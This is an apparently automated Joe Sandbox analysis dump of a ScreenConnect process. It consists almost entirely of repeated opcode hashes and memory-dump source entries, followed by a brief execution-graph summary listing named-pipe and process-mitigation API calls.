                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 01cc1ee957d3a8a96b6c8eba5b38fdf5f0de6008c134921490df65c348372631
                                                                                                                                                                                                                                                                          • Instruction ID: f06a2c320d49ef8b8a0fcad2aebfbd9803895d2ba43a788fb5aa07121cc2cdb0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01cc1ee957d3a8a96b6c8eba5b38fdf5f0de6008c134921490df65c348372631
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF012C7B7400108B8748DA6DF8949AFB7EAEBD9665314847AFA09C7321CE32EC138754
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 411a133126c44ce99d7d8f7efbbffe20f38ede3f1301d6809847aaaa7fa0b528
                                                                                                                                                                                                                                                                          • Instruction ID: 7de51d52eb352290c3eecfb590bf603e7dc1a9f2d0df410b12247309d7f318e2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 411a133126c44ce99d7d8f7efbbffe20f38ede3f1301d6809847aaaa7fa0b528
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F118E71E80305AFDB18CA6DC840AEBB7F6EFC5300F1484A6D414D7254E7729D01DB91
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 4a1e6b48aaa4ac751da5e5467ed98395bf1f450da8f52473b2e00304faafe7e5
                                                                                                                                                                                                                                                                          • Instruction ID: a9acd0d45b4356d8d485700fd8218b5e50fc79bb536f4187f3fce82dbdbf0823
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a1e6b48aaa4ac751da5e5467ed98395bf1f450da8f52473b2e00304faafe7e5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5711463190405EDBCB05DFA8D5908ECBFF2EF86314B98C595E005AB129DB36AD46CB60
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 678a9e95d175f8f958abb21394c72e8b1e2f9dc17a6d89757ee86e0b2b9bb5a2
                                                                                                                                                                                                                                                                          • Instruction ID: 59e28339b2f9cea86f71fe88dfa924efce306939ebcf27aa3047d084e9599f6c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 678a9e95d175f8f958abb21394c72e8b1e2f9dc17a6d89757ee86e0b2b9bb5a2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE11DA71E4421D8FDF18EBA8D965AEDBBB5EF89310F000469D106BB2B4DA781D45CBA0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 7c18cd5fea35c1b551a365ba9b8fca26f862ebe9e9b18cad2e2cbd22c2a59c46
                                                                                                                                                                                                                                                                          • Instruction ID: 8afa628c7780d80df80212f31796e13ebcb096593a856fb53d57da5a52e93fe2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c18cd5fea35c1b551a365ba9b8fca26f862ebe9e9b18cad2e2cbd22c2a59c46
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10110A719442198FDF15EFA8D965AEDBFF1EF4A310F0044A9D002BB3A4EB781845CBA1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Instruction ID: babdf68338174c3c1dc13ccef334bc09875d408e1afb578abc85ad3729e634dc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d7e9e533541bd87ab30932e8a34def92d44298274e35634f4b268e90c6bf306
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63F04C6250D3804FDB16C778B8916993FE0EEA7350B5909EFE082CF563D618A74AC351
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: b975184c0d45c545ddf71108ae55c76b0bb2e39c715efcc5589bcb577ee186a8
                                                                                                                                                                                                                                                                          • Instruction ID: ba8c5fa6465bfb90d84d6d4fafb4eed41d2cd0c2720c35e05f2920b1f5cfd75a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b975184c0d45c545ddf71108ae55c76b0bb2e39c715efcc5589bcb577ee186a8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37F05836B0D2085AD728CABEA400A9BBBEECBD4220B1484BFE55DC3641E931A8008764
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9c02a5df2899813c1f9da0ca42a13f8605882856f8688b9fdd6e0a8eaef5f724
                                                                                                                                                                                                                                                                          • Instruction ID: 99e5bbd14e25b069fdd96037a2bbcdb454e45b2eab9e715a6c99ef64f2938bb5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c02a5df2899813c1f9da0ca42a13f8605882856f8688b9fdd6e0a8eaef5f724
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E001C9B1D00219DFCB45DFADD8416DEBBF5EF8A310B2481A6D818DB215E3319A16CBD1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 48a227a68f81d899d6a155d1fc3fa190cf561eb5d6f19aaedf815f07b6bd47ac
                                                                                                                                                                                                                                                                          • Instruction ID: afde52ae3d8b6c6b08b8dc02bb5d656d42ded4c65480397f4b29250d76a4d78c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48a227a68f81d899d6a155d1fc3fa190cf561eb5d6f19aaedf815f07b6bd47ac
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EF089363002196F8F09AFD89C409AF3BEBEBC8360B00446AF605C7351DB354D1197A5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 62717b0ab788313626c5137f5b96dba83db783f191755523765c633671fbd2c9
                                                                                                                                                                                                                                                                          • Instruction ID: 7d5c76ffee083cfcbee6693963db7d8216d3e4d601925a2755b994ff0e552bf8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62717b0ab788313626c5137f5b96dba83db783f191755523765c633671fbd2c9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBF02B713156989FC715A678A85842E7FA59ADA22131480EED512C7387CE249902CF90
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 8ba80b080eb096cd5304b5cb81f9894ea1deea881e499dbe65d3bf04ffa2ca6f
                                                                                                                                                                                                                                                                          • Instruction ID: 5d641423f92bab9b66ab36c655e655489b3d68861e464d119c51d44f11199748
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ba80b080eb096cd5304b5cb81f9894ea1deea881e499dbe65d3bf04ffa2ca6f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F05E313002045F8714DAADE884D5FBBEDEFC97A0714863AE509CB354DB71ED0587A0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 33a078093b4812185db4864b7a494750546f2b99416e443a19697d21ab67ed00
                                                                                                                                                                                                                                                                          • Instruction ID: ec6729f89d43dbec2913cb9ec62d6b0718792ef75a7bce799b01b7549ab9bfe5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33a078093b4812185db4864b7a494750546f2b99416e443a19697d21ab67ed00
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DF05E317002056F8714DA6DE880E5BBBEDEF857A0714857AE419CB3A4DB71ED0687A0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 16aced9e5e16be7025fa2661e9fb0a099748b03fbf93f774277c6839794d9d6f
                                                                                                                                                                                                                                                                          • Instruction ID: 5a2ae09351255ec5d97a4c9ae45fa077ab620009c8955a31a6714bd1b934b5d2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16aced9e5e16be7025fa2661e9fb0a099748b03fbf93f774277c6839794d9d6f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7F0E2317043029BC715A79EE8809ABBBEEDFC5B1030485BAE229CB314DF60EC098790
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d3f1d475e9ab248f09fee69be4784d8c7de2e4abb0d434bc550fce6108ca486d
                                                                                                                                                                                                                                                                          • Instruction ID: 8630a6441bdefc97237005d8586dcc56489a83c45bc0217cb6813e7c3675bc91
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3f1d475e9ab248f09fee69be4784d8c7de2e4abb0d434bc550fce6108ca486d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCF09A74A0A2459FC705CB68D891A1EBBF5EF97300B14C4EAED00CB396DA31DD12C790
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 1c5dce97eeae8ed5f9629f00b1414ee671c2d77e011c8561eb6d80f0d336cd70
                                                                                                                                                                                                                                                                          • Instruction ID: d77007d48e235c8c0948e166fe324520481d327a117fd4d5e4fa37c4cbb6d02b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c5dce97eeae8ed5f9629f00b1414ee671c2d77e011c8561eb6d80f0d336cd70
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BF0A7313046504FCB156FADA4D866E7FE6EBC975171405BEE106C7342CE754C06CB65
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 6b6027255d5fa993f92412eeefb7aadf033f274dbe55ade484708a5b38d58120
                                                                                                                                                                                                                                                                          • Instruction ID: 9c15201c66f721b15560d2ee13d7c697d0d95304dbfb46b92f341e239b1e6407
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b6027255d5fa993f92412eeefb7aadf033f274dbe55ade484708a5b38d58120
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F05CB1D0C7483FCB1986ACAC616EDBFF49F97310B1840EBD089C7243D8264E068754
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: c52e7b94ee9d88ded73b0d03acbfece72de5da2e060204fc27ff0ed5ce4c64e1
                                                                                                                                                                                                                                                                          • Instruction ID: 73c9aebd966f6e403f64026a7fa8cc3c2238e461df990cfc970023c2181e1980
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c52e7b94ee9d88ded73b0d03acbfece72de5da2e060204fc27ff0ed5ce4c64e1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69F01F34A0838CEFCB44EBA8D595A9CBBF4FB04740F6040A8E405A7210DB34AF84DB40
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 468bcd4d83bdb086a396f4be04febe5726c40d05e3428467ae8ef4703937bd5f
                                                                                                                                                                                                                                                                          • Instruction ID: 41d4cc1722ee88cc474b891f20b5b3cf561dfe0475fa5616ba7f711352845418
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 468bcd4d83bdb086a396f4be04febe5726c40d05e3428467ae8ef4703937bd5f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7F0A032A0D3945EC715CBBA9801D9B7FE9CFC621070880BFD049C3691D92494018725
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: a4009417cc80e59f22fc0eb76aec155941ec97d331c69aa741c8cd9094263344
                                                                                                                                                                                                                                                                          • Instruction ID: f7006a40efa5ef6c6ec2f5650caceb019954b7f5ac56c9bc8e9a862cc89aeca5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4009417cc80e59f22fc0eb76aec155941ec97d331c69aa741c8cd9094263344
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08F05E30B00115CFC715DF6DD564AAEBBE5EF8935170480A9E819CB364EB34DD01CB81
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 88c2666933d2e4493cf2be9de6d4c2392d2aadc6365c61b7b33fbdefba73b26b
                                                                                                                                                                                                                                                                          • Instruction ID: 8c78c7d0c7d6c1156514c9345e6137ac52b93ad13699eff699f0d86dd579a680
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88c2666933d2e4493cf2be9de6d4c2392d2aadc6365c61b7b33fbdefba73b26b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FE030357082086B4B04CA4AD440D5BBBEADBC9360714C066F919C7355DA31DD028BA4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: f1311b120c52b3ae96ac774254368dbff2a4c2a1df4d179601a49450b0ee0209
                                                                                                                                                                                                                                                                          • Instruction ID: 4a15fe1031f5b18ccec218e3121cfec70fc3b42c23959eb8f5ad1cf8eccea120
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1311b120c52b3ae96ac774254368dbff2a4c2a1df4d179601a49450b0ee0209
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F082322582005BC319A778A85189F3BE5DEC2311B1489FBE145CB652DF26DD0A87D0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 207451298882e88cd3f7649125fbefe31756ae8b50706c0b540f96d47d2eebe0
                                                                                                                                                                                                                                                                          • Instruction ID: 55fa716b5ef81b19f082d4be4fef363ba58c0606a7f76b2d771ee991e0102ed7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 207451298882e88cd3f7649125fbefe31756ae8b50706c0b540f96d47d2eebe0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13F0B271E002199F8B44DFADC84169EFBF5EF89300B24806AD918EB210E331AA128B80
Memory Dump Source
• Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d8fc81872f7546835dfde89d741bdf4a86699403adbd11d98ea55f5bbab4ac81
                                                                                                                                                                                                                                                                          • Instruction ID: f1c0e5ba38d76d310211554529273368c0ac3aef3393cc9b87e6d33d6fcac56b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8fc81872f7546835dfde89d741bdf4a86699403adbd11d98ea55f5bbab4ac81
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FD06C3849E3908FEB12AB6898546523FF0FB07344B9548DAD041CB666EBA80949CB23
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: e9e3e7ec1ccec24d45f8787a1585cc90cc3674ee025eb1e1e74bf5d48320d1c1
                                                                                                                                                                                                                                                                          • Instruction ID: 370378b5e38e2d3a5f6b3d54dcfb356e1532a22b1d82f5977523db0879e67072
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9e3e7ec1ccec24d45f8787a1585cc90cc3674ee025eb1e1e74bf5d48320d1c1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38D0C73141470D8AC700BF78D454469B7B8EED5240F00C65AE44957121FF70E6D0D681

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:11.8%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                          Signature Coverage:37.5%
                                                                                                                                                                                                                                                                          Total number of Nodes:8
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                                                                                                                                                          execution_graph 13843 7ff848f43642 13844 7ff848f651d0 CreateNamedPipeW 13843->13844 13846 7ff848f65303 13844->13846 13838 7ff848f48014 13840 7ff848f4801d 13838->13840 13839 7ff848f48082 13840->13839 13841 7ff848f480f6 SetProcessMitigationPolicy 13840->13841 13842 7ff848f48152 13841->13842
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 0^$I$0`$I$pW%I
                                                                                                                                                                                                                                                                          • API String ID: 0-1166310409
                                                                                                                                                                                                                                                                          • Opcode ID: 61c24aeb148d147097f3ae5c913f7309ed9a187a68490c189a4310ef403ca2a2
                                                                                                                                                                                                                                                                          • Instruction ID: b99087a8a57d7a71c41cac1358587a3707e03f736a4864c7a5097806a23afc24
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61c24aeb148d147097f3ae5c913f7309ed9a187a68490c189a4310ef403ca2a2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82C21531A1DAAB8FF7A8FF2894556B5B7E1FFA4390F140179C45EC32D2DE28A9058341

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 1147 7ff848f43642-7ff848f6523a 1150 7ff848f6523c-7ff848f65241 1147->1150 1151 7ff848f65244-7ff848f65301 CreateNamedPipeW 1147->1151 1150->1151 1153 7ff848f65309-7ff848f6533c 1151->1153 1154 7ff848f65303 1151->1154 1154->1153
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
